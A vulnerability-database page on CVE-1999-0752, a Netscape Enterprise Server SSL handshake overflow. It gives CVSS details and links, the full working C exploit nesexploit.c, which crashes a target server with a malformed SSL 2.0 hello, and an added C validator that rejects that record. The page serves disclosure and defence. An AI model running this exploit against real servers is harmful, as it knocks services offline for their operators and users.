CVE-1999-0752
CVSS 5.0
Published: 1999-07-06 00:00:00
Revised: 2008-09-09 08:35:20

[Original] Denial of service in Netscape Enterprise Server via a buffer overflow in the SSL handshake.


[CNNVD] Netscape Enterprise Server Denial of Service Vulnerability (CNNVD-199907-010)

        Netscape Enterprise Server can be made to deny service through a buffer overflow in its SSL handshake code.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: NONE [no impact on system integrity]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0752
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0752
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199907-010
(official data source) CNNVD

- Other links and resources

- Vulnerability information

Netscape Enterprise Server Denial of Service Vulnerability
Medium severity    Buffer overflow
1999-07-06 00:00:00 (published)    2006-09-05 00:00:00 (updated)
Remote
        Netscape Enterprise Server can be made to deny service through a buffer overflow in its SSL handshake code.

- Advisories and patches


- Vulnerability information (19416)

Netscape Enterprise Server <= 3.6 SSL Buffer Overflow DoS Vulnerability (EDBID:19416)
Platform: windows    Type: dos
1999-07-06    Verified
0    Arne Vidstrom
N/A
source: http://www.securityfocus.com/bid/516/info

Netscape's Enterprise Server suffers from a buffer overflow error in the SSL handshaking code that causes it to crash when the buffer is overrun. 

  //
  // nesexploit.c - v1.02 - by Arne Vidstrom, winnt@bahnhof.se
  //
  // This program crashes Netscape Enterprise Server when it is
  // running in SSL mode, by exploiting a bug in the SSL handshake
  // code. The server crashes if the client:
  //
  //  * starts with SSL 2.0 format
  //  * uses long record header
  //  * uses padding >= 8
  //  * sends at least 11 bytes more data than it specifies in the
  //    header
  //  * sends at least about 4 kb data
  //
  // I haven't included any error handling in the code because it's
  // so boring to write... ;o)
  //

  #include <winsock.h>
  #include <string.h>
  #include <stdio.h>

  #define sockaddr_in struct sockaddr_in
  #define sockaddr struct sockaddr

  // Some combinations of these three constants will crash the server,
  // others will not.

  #define PADDING 8
  #define SPECIFIED_SIZE 11822
  #define ACTUAL_SIZE 11833

  void main(void)
  {
          // IP address of the server - set to your own server and nobody
          // elses :o)
          char ipaddr[25] = "xxx.xxx.xxx.xxx";

          // SSL port
          unsigned short port = xxxxx;

          SOCKET socket1;
          unsigned char s[65536];
          int errorCode;
          WSADATA winSockData;
          sockaddr_in peer;
          int result;
          unsigned char i;
          unsigned int l;
          int flags;

          printf("\nnesexploit.c - developed by Arne Vidstrom, winnt@bahnhof.se\n\n");

          // Allocate a socket, connect and stuff...
          errorCode = WSAStartup(0x0101, &winSockData);
          socket1 = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
          peer.sin_family = AF_INET;
          peer.sin_port = htons(port);
          peer.sin_addr.s_addr = inet_addr(ipaddr);
          for (i = 0; i < 8; i++)
                  peer.sin_zero[i] = 0;
          result = connect(socket1, (sockaddr *) &peer, sizeof(peer));
          if (result != 0)
                  printf("Ehmn, where's that server? ;o)\n\n");

          // Initialize the buffer with a lot of '.' Anything would do...
          for (l=0; l<65536; l++)
                  s[l] = '.';

          // Version 2.0 Format Header with padding.
          // Shouldn't be any padding because this part is not encrypted,
          // but without padding the server won't crash. :o)
          s[0] = (SPECIFIED_SIZE & 0xff00) >> 8;
          s[1] = (SPECIFIED_SIZE & 0x00ff);
          s[2] = PADDING;

          // Client says Hello!
          s[3] = 0x01;

          // Client wishes to use Version 3.0 later (there will be no "later" though...)
          s[4] = 0x03;
          s[5] = 0x00;

          // Cipher Specs Length = 12 (0x0c): four 3-byte cipher specs follow the fixed fields
          s[6] = 0x00;
          s[7] = 0x0c;

          // Session ID = 0
          s[8] = 0x00;
          s[9] = 0x00;

          // Challenge Length = 16
          s[10] = 0x00;
          s[11] = 0x10;

          // Cipher Specs Data (four 3-byte cipher specs)
          s[12] = 0x02;
          s[13] = 0x00;
          s[14] = 0x80;

          s[15] = 0x04;
          s[16] = 0x00;
          s[17] = 0x80;

          s[18] = 0x00;
          s[19] = 0x00;
          s[20] = 0x03;

          s[21] = 0x00;
          s[22] = 0x00;
          s[23] = 0x06;

          // Challenge Data is a few '.' from above

          // The rest is also '.' from above

          // Send all this to the server
          flags = 0;
          result = send(socket1, s, ACTUAL_SIZE, flags);
          if (result != SOCKET_ERROR)
                  printf("Done!\n\n");

          // Clean up
          closesocket(socket1);
          WSACleanup();
  }		
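The conditions listed in the exploit's header comment (SSL 2.0 long record header, non-zero padding byte, more bytes on the wire than the header declares) can be checked mechanically on the receiving side. The C program below is an added example written for this page; it is not part of nesexploit.c and does not come from Arne Vidstrom or the original page. It builds the same CLIENT-HELLO record that nesexploit.c sends, portably and without opening a socket, and then runs it through a small SSLv2 record validator that rejects exactly the inconsistencies the exploit relies on. The function names, error codes and the ssl2_hdr struct are this example's own; the cipher-spec bytes and the three size constants are copied from the exploit. The validator's rules (padding must be zero on a cleartext CLIENT-HELLO, the cipher-spec length must be a multiple of 3, the challenge must be 16 to 32 bytes, and the inner lengths must add up to the declared record length) are this example's reading of the SSL 2.0 record format; it shows how a reader should reject the malformed record and makes no claim about which of these checks Netscape's code lacked.

```c
/* Added example, not part of nesexploit.c or the original page: build the SSL 2.0
 * CLIENT-HELLO record nesexploit.c sends, then validate SSLv2 record framing the way a
 * hardened server-side reader should. Names, error codes and ssl2_hdr are this example's
 * own; the cipher-spec bytes and the three size constants are the exploit's. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SSL2_MT_CLIENT_HELLO 0x01

/* Decoded SSL 2.0 record header: 2-byte short form or 3-byte long form. */
typedef struct {
    int      long_header;  /* 1 when bit 7 of byte 0 is clear: 3-byte header with padding byte */
    uint16_t record_len;   /* bytes that follow the header, as declared by the sender */
    uint8_t  padding;      /* trailing padding count, long form only */
    size_t   header_len;   /* 2 or 3 */
} ssl2_hdr;

enum {
    SSL2_OK               =  0,
    SSL2_ERR_SHORT_HEADER = -1, /* fewer bytes than the header itself needs */
    SSL2_ERR_TRUNCATED    = -2, /* header declares more bytes than were received */
    SSL2_ERR_TRAILING     = -3, /* more bytes received than the header declares */
    SSL2_ERR_PADDING      = -4, /* padding on a cleartext record (CLIENT-HELLO is never encrypted) */
    SSL2_ERR_BAD_HELLO    = -5  /* CLIENT-HELLO field lengths do not add up to record_len */
};

/* Decode the record header. Returns 0 on success, -1 if n is too small. */
int ssl2_parse_header(const uint8_t *buf, size_t n, ssl2_hdr *h)
{
    if (n < 2) return -1;
    if (buf[0] & 0x80) {             /* short form: 15-bit length, no padding byte */
        h->long_header = 0; h->header_len = 2; h->padding = 0;
        h->record_len = (uint16_t)(((buf[0] & 0x7f) << 8) | buf[1]);
        return 0;
    }
    if (n < 3) return -1;            /* long form: bit 6 = escape, 14-bit length, padding byte */
    h->long_header = 1; h->header_len = 3; h->padding = buf[2];
    h->record_len = (uint16_t)(((buf[0] & 0x3f) << 8) | buf[1]);
    return 0;
}

/* Lay the record out as nesexploit.c does: long header, CLIENT-HELLO, version 3.0, 12 bytes
 * of cipher specs, empty session id, 16-byte challenge, '.' filler up to actual_len.
 * Returns bytes written, or 0 if the arguments cannot be honoured. */
size_t ssl2_build_client_hello(uint8_t *out, size_t cap, uint16_t declared_len,
                               size_t actual_len, uint8_t padding)
{
    static const uint8_t cipher_specs[12] = {   /* the four 3-byte specs nesexploit.c sends */
        0x02, 0x00, 0x80,  0x04, 0x00, 0x80,  0x00, 0x00, 0x03,  0x00, 0x00, 0x06 };
    const size_t min_len = 3 + 9 + sizeof cipher_specs + 16;   /* header, fixed fields, specs, challenge */
    if (actual_len < min_len || actual_len > cap || declared_len > 0x3fff) return 0;
    memset(out, '.', actual_len);                    /* challenge bytes and all excess are '.' */
    out[0] = (uint8_t)((declared_len >> 8) & 0x3f);  /* bits 7 and 6 clear: long header, not escape */
    out[1] = (uint8_t)(declared_len & 0xff);
    out[2] = padding;
    out[3] = SSL2_MT_CLIENT_HELLO;
    out[4] = 0x03; out[5] = 0x00;                    /* client version 3.0 */
    out[6] = 0x00; out[7] = 0x0c;                    /* cipher specs length = 12 */
    out[8] = 0x00; out[9] = 0x00;                    /* session id length = 0 */
    out[10] = 0x00; out[11] = 0x10;                  /* challenge length = 16 */
    memcpy(out + 12, cipher_specs, sizeof cipher_specs);
    return actual_len;
}

/* Validate one buffered record before any field in it is trusted. */
int ssl2_check_client_hello(const uint8_t *buf, size_t n)
{
    ssl2_hdr h;
    if (ssl2_parse_header(buf, n, &h) != 0) return SSL2_ERR_SHORT_HEADER;
    size_t end = h.header_len + h.record_len;
    if (end > n) return SSL2_ERR_TRUNCATED;
    if (end < n) return SSL2_ERR_TRAILING;                        /* "11 bytes more than specified" */
    if (h.long_header && h.padding != 0) return SSL2_ERR_PADDING;  /* "padding >= 8" on cleartext */
    const uint8_t *body = buf + h.header_len;
    if (h.record_len < 9 || body[0] != SSL2_MT_CLIENT_HELLO) return SSL2_ERR_BAD_HELLO;
    size_t cs  = ((size_t)body[3] << 8) | body[4];   /* cipher specs length, multiple of 3 */
    size_t sid = ((size_t)body[5] << 8) | body[6];   /* session id length */
    size_t ch  = ((size_t)body[7] << 8) | body[8];   /* challenge length, 16..32 */
    if (cs % 3 != 0 || ch < 16 || ch > 32) return SSL2_ERR_BAD_HELLO;
    if (9 + cs + sid + ch != h.record_len) return SSL2_ERR_BAD_HELLO;
    return SSL2_OK;
}

/* Build into a static buffer and return the validator's verdict for one triple. */
int verdict_for(uint16_t declared_len, size_t actual_len, uint8_t padding)
{
    static uint8_t pkt[65536];
    size_t n = ssl2_build_client_hello(pkt, sizeof pkt, declared_len, actual_len, padding);
    return n ? ssl2_check_client_hello(pkt, n) : SSL2_ERR_SHORT_HEADER;
}

int main(void)
{   /* nesexploit.c's constants: PADDING 8, SPECIFIED_SIZE 11822, ACTUAL_SIZE 11833 */
    printf("exploit record: %d\n", verdict_for(11822, 11833, 8));  /* -3, trailing data */
    printf("padding only:   %d\n", verdict_for(37, 40, 8));         /* -4, padding on cleartext */
    printf("well-formed:    %d\n", verdict_for(37, 40, 0));         /* 0 */
    return 0;
}
```

Compile with any C99 compiler; the three verdicts show that the exploit record fails on the length mismatch before the padding check is even reached, that padding alone is enough to reject an otherwise consistent CLIENT-HELLO, and that a 37-byte hello with a matching header and no padding passes. The validator checks the wire lengths before it reads any field of the hello body, which is the order a reader must use if the body lengths are not to be trusted on their own.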

- Vulnerability information

121
Netscape Enterprise SSL Handshake DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public Uncoordinated Disclosure

- Vulnerability description

- Timeline

1999-07-06 Unknown
1999-07-06 Unknown

- Solution

Products

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site].

Copyright notice

CVE/CWE/OVAL are registered trademarks of MITRE Corporation; their official data sources are kept on MITRE's websites.